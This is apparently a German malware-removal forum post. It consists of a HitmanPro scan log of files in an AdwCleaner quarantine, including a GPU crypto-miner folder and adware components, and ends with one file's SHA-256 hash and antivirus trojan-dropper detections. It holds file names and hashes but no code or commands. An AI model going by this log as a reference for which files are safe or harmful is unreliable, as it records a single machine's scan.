         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -1.2s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -1.1s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -1.1s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.9s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.7s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.7s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.6s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.6s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.6s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
         -0.5s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
         -0.5s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
         -0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
         -0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
         -0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
         -0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.1s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.1s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.1s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.3s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.3s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.3s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.4s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          0.5s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          0.5s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          0.5s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          0.5s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          0.6s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          0.6s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          0.6s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          0.6s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          0.7s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          0.7s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          0.7s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          0.7s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          0.8s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          0.8s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          0.8s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          0.8s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          0.9s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          0.9s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          0.9s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          0.9s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.0s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.0s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.0s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.0s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.3s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.4s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          1.4s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.4s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          2.4s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          2.8s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          6.4s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          6.9s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.4s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          7.6s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         11.4s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

BaBi · 13.02.2017, 23:03

hitman teil 6

Code:

ATTFilter

   C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
      Size . . . . . . . : 983.040 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 7.6
      SHA-256  . . . . . : F271781A85B5EF989B5AEF6CAD4FB1D034ECAC38B00A527AA5170E2C2E5341B8
    > Bitdefender  . . . : Trojan.Agent.CCYW
    > Kaspersky  . . . . : Trojan-Dropper.Win32.Agent.sblf
